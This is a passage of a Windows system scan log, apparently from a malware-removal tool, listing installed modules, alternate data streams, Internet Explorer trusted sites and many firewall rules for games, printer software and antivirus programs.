2014-06-03 16:18 - 2014-06-03 16:18 - 00610144 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareScanner.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00035192 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_timer-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00326000 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareScannerScheduler.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00453496 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareRealTimeProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00227688 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareIncompatibles.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00218976 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiSpam.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00171368 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareAntiPhishing.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00786800 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareParentalControl.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 01936744 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareWebProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00422256 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareEmailProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00650608 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareNetworkProtection.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00358744 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwarePromo.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00298336 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareFeedback.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00371576 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareThreatWorkAlliance.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00154464 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\SecurityCenter.dll
2011-09-03 19:31 - 2013-04-20 19:04 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2014-07-16 11:06 - 2014-07-16 11:06 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 07715160 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe
2014-06-03 16:18 - 2014-06-03 16:18 - 00500088 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_locale-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00364896 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\HtmlFramework.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00066904 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\DllStorage.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00803696 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTrayDefaultSkin.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00139608 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\Localization.dll
2013-08-02 17:13 - 2013-01-04 17:04 - 00147456 _____ () C:\Program Files (x86)\Standard Mouse Driver\Monitor.EXE
2011-11-11 15:07 - 2011-11-11 15:07 - 00265240 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2011-08-12 13:19 - 2011-08-12 13:19 - 00680984 _____ () C:\Program Files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
2014-07-16 11:05 - 2014-07-16 11:05 - 05558432 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 13:05 - 2014-10-11 13:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-06-20 06:29 - 2015-06-03 17:06 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2010-05-07 18:35 - 2010-05-07 18:35 - 02143576 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2010-05-07 18:35 - 2010-05-07 18:35 - 07954776 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2010-05-07 18:36 - 2010-05-07 18:36 - 00340824 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2010-05-07 18:37 - 2010-05-07 18:37 - 00027480 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2010-05-07 18:37 - 2010-05-07 18:37 - 00126808 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2013-08-02 17:13 - 2012-12-20 14:05 - 00045056 _____ () C:\Program Files (x86)\Standard Mouse Driver\lan.dll
2013-08-02 17:13 - 2012-08-30 14:24 - 00061440 _____ () C:\Program Files (x86)\Standard Mouse Driver\hiddriver.dll
2014-07-03 06:45 - 2014-07-03 06:45 - 32733056 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libcef.dll
2012-07-23 15:10 - 2012-07-23 15:10 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2014-07-03 06:45 - 2014-07-03 06:45 - 00742784 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libglesv2.dll
2014-07-03 06:45 - 2014-07-03 06:45 - 00136576 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows\system32\EP9B90ED:ARTISAN 830
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\.DEFAULT\...\freerealms.com -> freerealms.com
IE trusted site: HKU\.DEFAULT\...\soe.com -> soe.com
IE trusted site: HKU\.DEFAULT\...\sony.com -> sony.com


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.2.1

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{D51AE41D-5927-4392-853D-0905F092E3F1}] => (Allow) C:\ProgramData\NexonUS\NGM\NGM.exe
FirewallRules: [{BF4ECB20-28CD-4A53-A725-A8308314B82E}] => (Allow) C:\ProgramData\NexonUS\NGM\NGM.exe
FirewallRules: [{71057DFB-1576-4A31-8FAD-CE735A33D9EC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{05A046EB-FE34-450E-A1F9-95C2C6A79C54}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{8B783A98-2484-4B5B-A6AF-6476C343C2F8}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{943A64F6-98BB-4AA6-9F22-77C3BDA084C0}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{C0A85823-0FA9-483F-B7A8-0FE8930260D6}] => (Allow) LPort=14531
FirewallRules: [{5454141A-D59B-4D32-99C5-CA24EDE4C73F}] => (Allow) LPort=14531
FirewallRules: [{904B5B64-8F2F-429E-87BE-AFA706FE24E4}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{AFB4BD34-A61C-4E34-8088-D768CEA67EA8}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{FFA339A5-5FA6-45B2-8413-8B67C86BFC6F}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.exe
FirewallRules: [{037A2E3C-824C-4E9F-A004-0D7E6CBC3B36}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.exe
FirewallRules: [{F865E764-BE54-4098-A6D0-B8AE9F66D6FA}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.patch.exe
FirewallRules: [{55A32708-A020-4379-AC67-3DA07416A3D9}] => (Allow) C:\Program Files (x86)\World of Warcraft\Launcher.patch.exe
FirewallRules: [{1A09075C-65BD-4A4E-89BF-DA3E929B61EF}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{08EB0615-A41B-4652-8CEB-CE51B9FF40AE}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{522DC7DD-CC96-4CAE-BE0B-0C11695712B7}] => (Allow) LPort=14531
FirewallRules: [{CCE0DC87-FE8D-4423-BD90-9BAC5037D1F4}] => (Allow) LPort=14531
FirewallRules: [{89A49994-4F07-4AE2-9D78-A97593A97ECF}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{94E95B95-7294-4CA2-85B6-21632F7FDEDD}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [UDP Query User{C40DC927-9C1E-479E-A57F-289A9C3AFE9F}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [TCP Query User{488275FE-D29B-4C21-8010-4BDF61FDC9BF}C:\users\user\desktop\vindictus\en-us\vindictus.exe] => (Allow) C:\users\user\desktop\vindictus\en-us\vindictus.exe
FirewallRules: [UDP Query User{91070D6C-E6FD-4665-9172-A1D0A57623A3}C:\users\user\desktop\vindictus\en-us\vindictus.exe] => (Allow) C:\users\user\desktop\vindictus\en-us\vindictus.exe
FirewallRules: [{B53291FE-0BA5-4515-857E-72DD27736BD8}] => (Allow) C:\Users\User\Desktop\Vindictus\en-US\NMService.exe
FirewallRules: [{41FB5650-07A2-42BD-BBFB-EBA0C54611D4}] => (Allow) C:\Users\User\Desktop\Vindictus\en-US\NMService.exe
FirewallRules: [TCP Query User{447F6735-0804-480C-A124-23440337B031}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [UDP Query User{A0B80899-8D79-417F-9E49-BDFD06293053}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [TCP Query User{9AD58473-C859-479F-BB5A-B34C5F6BEA69}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [UDP Query User{8339AAF9-D84A-4E56-9E74-7EE58E283263}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [TCP Query User{530EAC13-9FD8-4FF2-8F85-73A90C35ACA9}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{4D31D5FC-CB48-47E3-823D-54EC69BDEEF7}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4DDFDFE6-33A3-43F4-907B-7616FCBFC6C7}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\PbLauncher.exe
FirewallRules: [{FA07473F-E743-4509-9DC0-863885D07737}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\PbLauncher.exe
FirewallRules: [{D44AB82D-EA24-4B9B-A816-CD874794608A}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\pbclient.exe
FirewallRules: [{7FA8D1CB-3F2F-44F4-BBB4-6E07839429A8}] => (Allow) C:\Program Files (x86)\BrawlBusters(EN)\bin\pbclient.exe
FirewallRules: [TCP Query User{357A3BE6-8FE8-4754-9BFB-2E8C0A3DC9B1}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [UDP Query User{D8104418-51EF-4019-B7C4-B7E01E699538}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [{2FF4BC53-31A4-4600-A303-3EE13D79EF89}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [{43C06013-A01B-40D5-9C7D-62BD989D0516}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [{D422C0D1-6C58-4D7A-9530-60AC03F06F5D}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Config V3\ENConfig.exe
FirewallRules: [{5D1C574B-CE8A-4733-971E-AED5A91C5EF6}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Config V3\ENConfig.exe
FirewallRules: [{B94F48B1-E360-479E-A954-BA377D3023D6}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{E8590ADE-8E0C-4A8A-805B-E6DC1C40D141}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{4DDCF984-083A-48FF-88C1-3CE70AC5E7BC}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [{7CFC30F2-7792-4A72-B152-97C50ED5F9D4}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [TCP Query User{78E82014-A085-4368-BABF-91AE51EFEDD3}D:\common\driver update\edupdate.exe] => (Allow) D:\common\driver update\edupdate.exe
FirewallRules: [UDP Query User{90A74349-2585-418A-B5D2-8F2A2F7BE59B}D:\common\driver update\edupdate.exe] => (Allow) D:\common\driver update\edupdate.exe
FirewallRules: [{F897F84C-8B1C-44A6-97FA-14A3E0DE8F95}] => (Allow) C:\Program Files (x86)\Logitech\Vid\Vid.exe
FirewallRules: [{B6ED0B87-8FC2-4358-93F8-83D171354341}] => (Allow) C:\Program Files (x86)\Logitech\Vid\Vid.exe
FirewallRules: [TCP Query User{1A4103E8-5636-4B67-ADA8-38053E98C581}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2129DA3F-5F82-4BAF-BC0C-7E31012ABEC5}C:\users\user\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\user\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{70E35DB8-0B22-4736-A555-11F0D8021632}C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe] => (Allow) C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{853EA7B6-3518-4699-AE1B-6A939CCEF878}C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe] => (Allow) C:\program files (x86)\hi-rez studios\games\tribes alpha\binaries\win32\tribesascend.exe
FirewallRules: [TCP Query User{A25ECC8C-486F-40CA-8888-B8C4A3D13E73}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [UDP Query User{1A78765E-1DC4-480C-A6BF-2FEF30AA5E00}C:\program files (x86)\heroes of newerth\hon.exe] => (Allow) C:\program files (x86)\heroes of newerth\hon.exe
FirewallRules: [TCP Query User{BEBBDEA7-24E4-4D51-8E30-F12DB52E2637}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [UDP Query User{80341F1A-8F3C-4148-906F-7E82A2D389FF}C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe] => (Allow) C:\program files (x86)\steam\steamapps\teamdelarosa\team fortress 2\hl2.exe
FirewallRules: [TCP Query User{E20ABBD1-3575-41C2-8069-91C451455B1B}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [UDP Query User{0667C9C4-928B-4043-BAC8-E4FDEA95A9CE}C:\nexon\vindictus\en-us\vindictus.exe] => (Allow) C:\nexon\vindictus\en-us\vindictus.exe
FirewallRules: [{F709ADE1-8823-4E42-B690-58909F7D5EC1}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [{6C26375A-28FA-41BF-93D3-1B369451213A}] => (Allow) C:\Nexon\Vindictus\en-US\NMService.exe
FirewallRules: [TCP Query User{A564C33F-DF63-40AB-8A45-A8A632C7D5CE}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [UDP Query User{3A825E64-EB87-484C-AB25-32478D926C02}C:\nexon\dfo\dfo.exe] => (Allow) C:\nexon\dfo\dfo.exe
FirewallRules: [{F0DDEB3F-D2A2-4649-BE6A-3822FEBBED2B}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\RosettaStoneVersion3.exe
FirewallRules: [{60E1800A-A6CF-466A-8422-764F69D06560}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\RosettaStoneVersion3.exe
FirewallRules: [{572A2419-8DC9-4728-8BE0-E229B7C0BFD8}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\support\bin\win\RosettaStoneLtdServices.exe
FirewallRules: [{C43F63DA-0749-4EA5-8C02-BC8DEC47130E}] => (Allow) C:\Program Files (x86)\Rosetta Stone\Rosetta Stone Version 3\support\bin\win\RosettaStoneLtdServices.exe
FirewallRules: [{67D8D9EE-5B19-4B86-9138-C4262811ABE3}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{06B3A72C-9A3A-40FD-98DA-A3F69CDC7A2F}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{DF6A711B-8DA5-471F-89DB-2167B3BDCF71}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [{1190000F-14FD-484E-A707-6450C9B3DCDE}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [{57FBB4B3-7310-4D7B-AA48-E8F4CD826FD5}] => (Allow) C:\Nexon\Combat Arms\NMService.exe
FirewallRules: [{16FBB531-F522-4628-99F0-59DF7A1AC58F}] => (Allow) C:\Nexon\Combat Arms\NMService.exe
FirewallRules: [TCP Query User{4368FDC4-BA09-40F1-8A59-F680331FC5C9}C:\nexon\combat arms\engine.exe] => (Allow) C:\nexon\combat arms\engine.exe
FirewallRules: [UDP Query User{BFE6AA55-1F5B-4065-9B2E-F07E167875F3}C:\nexon\combat arms\engine.exe] => (Allow) C:\nexon\combat arms\engine.exe
FirewallRules: [TCP Query User{A73F4D1A-D849-4AC3-BE7D-8A8765E5E097}C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe] => (Allow) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [UDP Query User{3DD9AF0C-CFD5-42D3-A79F-80C6F3853A3B}C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe] => (Allow) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [{E2DCCC8A-13D6-4BF1-A38E-C22BBFC4B256}] => (Block) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [{7E6E59EE-BC01-4F81-AE33-99F61D50CA2B}] => (Block) C:\program files (x86)\avanquest\web easy professional 8\webeasy.exe
FirewallRules: [{7334AEE3-C44A-40CF-AFE0-573219C1F0EE}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [{FCDE9DF9-9C98-42F1-B113-4354E261C3E3}] => (Allow) C:\Program Files (x86)\Logitech\Vid HD\Vid.exe
FirewallRules: [TCP Query User{9A9822DB-E1B1-4464-BAA8-32D7282C84FB}C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe] => (Block) C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe
FirewallRules: [UDP Query User{E053FA9C-A040-49BF-B9BD-50E40C0E3E7B}C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe] => (Block) C:\program files (x86)\avanquest\web easy professional 8\vcomftp.exe
FirewallRules: [{F8A7FB33-C9B5-4D95-9F0D-06E342F6C4BA}] => (Allow) C:\Program Files\SmartFTP Client\SmartFTP.exe
FirewallRules: [{14AB70C9-DF3D-4096-938A-F6A352488095}] => (Allow) C:\Program Files\SmartFTP Client\SmartFTP.exe
FirewallRules: [{EDF1BAA3-E96B-43E3-9F07-F06FCC564AF8}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{0EFCD0B9-6794-47B7-A9A4-234CFC38E857}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{73D92A7F-944F-45BD-B987-B53CDFB8E870}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{FD161729-BD8F-4443-BFA3-6902C812F0E5}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{CB0810E1-CBB3-47B7-A755-9C6060F85A8C}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{54BA54D2-CE93-405A-A5EF-9E154CD2ADF1}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{84302438-2B8F-49BC-A1C3-8F06884C4EE1}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{0A772D59-27F5-4CBB-9ECF-E2A8BE6AE3C4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{D0AC3DA0-E804-4DC5-A404-AFC3CD504F3E}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{80673578-8D70-4503-A4ED-8C97EF116CC4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{E9522D9D-DF93-4CF3-8D1A-DEEDF8F1A494}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{178080E2-DF8D-4469-8418-B4F15A6A9B91}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\APB.exe
FirewallRules: [{65A3C4EA-6A0A-4723-A049-2CD7E5F1A0A4}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [{C703BF2A-8D5F-4B08-B981-0F8AEED9F4E2}] => (Allow) C:\Program Files (x86)\GamersFirst\APB Reloaded\Binaries\VivoxVoiceService.exe
FirewallRules: [TCP Query User{B7B59FF9-E96D-4FA9-9122-A1E7A3B3E612}C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe] => (Allow) C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe
FirewallRules: [UDP Query User{DDFBF5C1-2623-4D4F-BF9E-B614B785EFD3}C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe] => (Allow) C:\program files (x86)\zoom search engine 6.0\zoomindexer.exe
FirewallRules: [TCP Query User{6E21BC5B-CF80-46DC-BF74-FA4C27F2DFA0}C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe] => (Allow) C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe
FirewallRules: [UDP Query User{FC77E3FD-9F67-4407-ABF3-98E623476BA6}C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe] => (Allow) C:\users\public\sony online entertainment\installed games\dc universe online live\unreal3\binaries\win32\dcgame.exe
FirewallRules: [{8BA2E48B-E4E9-4514-BDA4-C53DC23428D3}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.515\Agent.exe
FirewallRules: [{91340649-47E4-427E-B998-9B197619F7B6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.515\Agent.exe
FirewallRules: [{CD3802BE-3A65-43DA-BAC5-836CD844A58C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.868\Agent.exe
FirewallRules: [{47E48EA3-7162-4720-A0D9-896CC4FE3B0C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.868\Agent.exe
FirewallRules: [{2E9988E8-A0BD-4915-A75A-C5BD5FB91E73}] => (Allow) C:\Program Files (x86)\Diablo III Beta\Diablo III.exe
FirewallRules: [{3D3ECDBD-CE3B-4975-A65C-91F01CCE639E}] => (Allow) C:\Program Files (x86)\Diablo III Beta\Diablo III.exe
FirewallRules: [{B21A5FD2-8C7B-47AE-8129-4F53366719EF}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{C1530BA2-B10C-4667-99F6-9A6C1EAC8902}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{D90840D3-3C93-4C96-81F5-7E267FD7CCB3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{E0A66101-60EE-4184-AD8C-0AF107B26180}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{AF18065E-B9E3-40F9-AE22-153A6AAB2B3F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{209C6096-5912-48F7-9C0B-C6122FC1C666}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{3144EBE9-E914-46BA-BCA6-DBA9EFE2F1A7}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{D8B68E6B-9DF8-4FAD-9258-62B31D1AE4F3}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{6318BEB2-4361-444F-9331-B684FE350F5E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe
FirewallRules: [{AEBCC558-36F1-45F7-B815-DF079716DC77}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{BB63B462-7383-4FA5-98D3-EA56F9A057D1}] => (Allow) C:\Program Files (x86)\common files\hp\digital imaging\bin\hpqphotocrm.exe
FirewallRules: [{AF30ED01-7075-446B-80A5-E57BD79739AA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqsudi.exe
FirewallRules: [{2A8DB980-B805-4A72-AD7B-3F9113FE93CD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpsapp.exe
FirewallRules: [{25AF0D1E-CFD7-4AAA-B292-AC2F8F9AF234}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpse.exe
FirewallRules: [{08C5BF5C-9965-4BFE-B314-E1EC9EC05F94}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{F59589A9-0EC4-436C-AA1A-F1DF729D63E9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{9BA30015-C795-4C7B-8A04-467FD973155D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
